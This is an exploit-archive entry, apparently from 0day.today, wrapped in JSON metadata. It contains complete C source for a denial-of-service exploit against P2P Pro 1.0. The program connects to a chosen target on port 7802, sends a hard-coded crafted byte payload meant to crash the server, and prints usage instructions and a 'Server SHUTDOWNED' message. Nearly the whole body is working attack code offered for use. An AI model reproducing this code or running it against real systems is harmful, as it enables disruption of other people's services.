Description
Exploit for unknown platform in category dos / poc
{"id": "1337DAY-ID-6028", "type": "zdt", "bulletinFamily": "exploit", "title": "P2P Pro 1.0 (command) Denial of Service Exploit", "description": "Exploit for unknown platform in category dos / poc", "published": "2005-09-02T00:00:00", "modified": "2005-09-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/6028", "reporter": "basher13", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-10T03:18:58", "viewCount": 21, "enchantments": {"score": {"value": -0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.0}, "sourceHref": "https://0day.today/exploit/6028", "sourceData": "===============================================\r\nP2P Pro 1.0 (command) Denial of Service Exploit\r\n===============================================\r\n\r\n\r\n\r\n/*\r\n P2P Pro Command DOS Exploit\r\n ------------------------------------\r\n Infam0us Gr0up - Securiti Research\r\n\r\n Info: infamous.2hell.com\r\n Vendor URL: http://www.digital-revolution.org/P2PPro.html\r\n\r\n*/\r\n\r\n#include string.h\r\n#include winsock2.h \r\n#include stdio.h \r\n\r\n#pragma comment(lib, \"ws2_32.lib\") \r\n\r\nchar doscore[] = \r\n\"\\x3f\\x3f\\xbc\\x59\\x70 \"\r\n\"\\x32\\x70\\x3f\\xe1 \"\r\n\"\\x2b\\x5c\\x3f\\xa6\\xeb\\xa6\"\r\n\"\\x50\\x46\\x2b\\x5c\\x3f\\xa6\\xeb\\xa6\"\r\n\"\\x50\\x4f\\x57\\x4e\\x45\\x44\\x2e\\x74\"\r\n\"\\x78\\x74\\x2b\\x5c\\x3f\\xa6\\xeb\\xa6\"\r\n\"\\x50\\x31\\x32\\x33\\x32\\x34\\x32\\x2e\\x6b\\x62\";\r\n\r\n\r\nint main(int argc, char *argv[]) \r\n{ \r\nWSADATA wsaData; \r\nWORD wVersionRequested; \r\nstruct hostent *pTarget; \r\nstruct sockaddr_in sock; \r\nchar *target; \r\nint port,bufsize; \r\nSOCKET inetdos; \r\n\r\nif (argc < 2) \r\n{ \r\nprintf(\" P2P Pro Command DOS Exploit \\n\", argv[0]);\r\nprintf(\" --------------------------------------\\n\", argv[0]);\r\nprintf(\" Infam0us Gr0up - Securiti Research\\n\\n\", argv[0]);\r\nprintf(\"[-]Usage: %s [target] [port]\\n\", argv[0]); \r\nprintf(\"[?]Exam: %s localhost 7802\\n\", argv[0]); \r\nexit(1); \r\n} \r\n\r\nwVersionRequested = MAKEWORD(1, 1); \r\nif (WSAStartup(wVersionRequested, &wsaData) < 0) return -1; \r\n\r\ntarget = argv[1]; \r\nport = 7802; \r\n\r\nif (argc >= 3) port = atoi(argv[2]); \r\nbufsize = 1024; \r\nif (argc >= 4) bufsize = atoi(argv[3]); \r\n\r\ninetdos = socket(AF_INET, SOCK_STREAM, 0); \r\nif(inetdos==INVALID_SOCKET) \r\n{ \r\nprintf(\"Socket ERROR \\n\"); \r\nexit(1); \r\n} \r\nprintf(\" P2P Pro Command DOS Exploit \\n\", argv[0]);\r\nprintf(\" --------------------------------------\\r\\n\\n\", argv[0]);\r\nprintf(\"Resolve host... \"); \r\nif ((pTarget = gethostbyname(target)) == NULL) \r\n{ \r\nprintf(\"FAILED \\n\", argv[0]); \r\nexit(1); \r\n} \r\nprintf(\"[OK]\\n \");\r\nmemcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length); \r\nsock.sin_family = AF_INET; \r\nsock.sin_port = htons((USHORT)port); \r\n\r\nprintf(\"[+] Connecting... \"); \r\nif ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) ))) \r\n{ \r\nprintf(\"FAILED\\n\"); \r\nexit(1); \r\n} \r\nprintf(\"[OK]\\n\");\r\nprintf(\"Target listen.. \\n\"); \r\nprintf(\"Sending bad procedure... \"); \r\nif (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1) \r\n{ \r\nprintf(\"ERROR\\n\"); \r\nclosesocket(inetdos); \r\nexit(1); \r\n} \r\nprintf(\"[OK]\\n \");\r\nprintf(\"[+] Server SHUTDOWNED!\\n\"); \r\nclosesocket(inetdos); \r\nWSACleanup(); \r\nreturn 0; \r\n}\r\n\r\n\r\n\n# 0day.today [2018-01-10] #", "_state": {"dependencies": 1645331224, "score": 1659766679}}
{}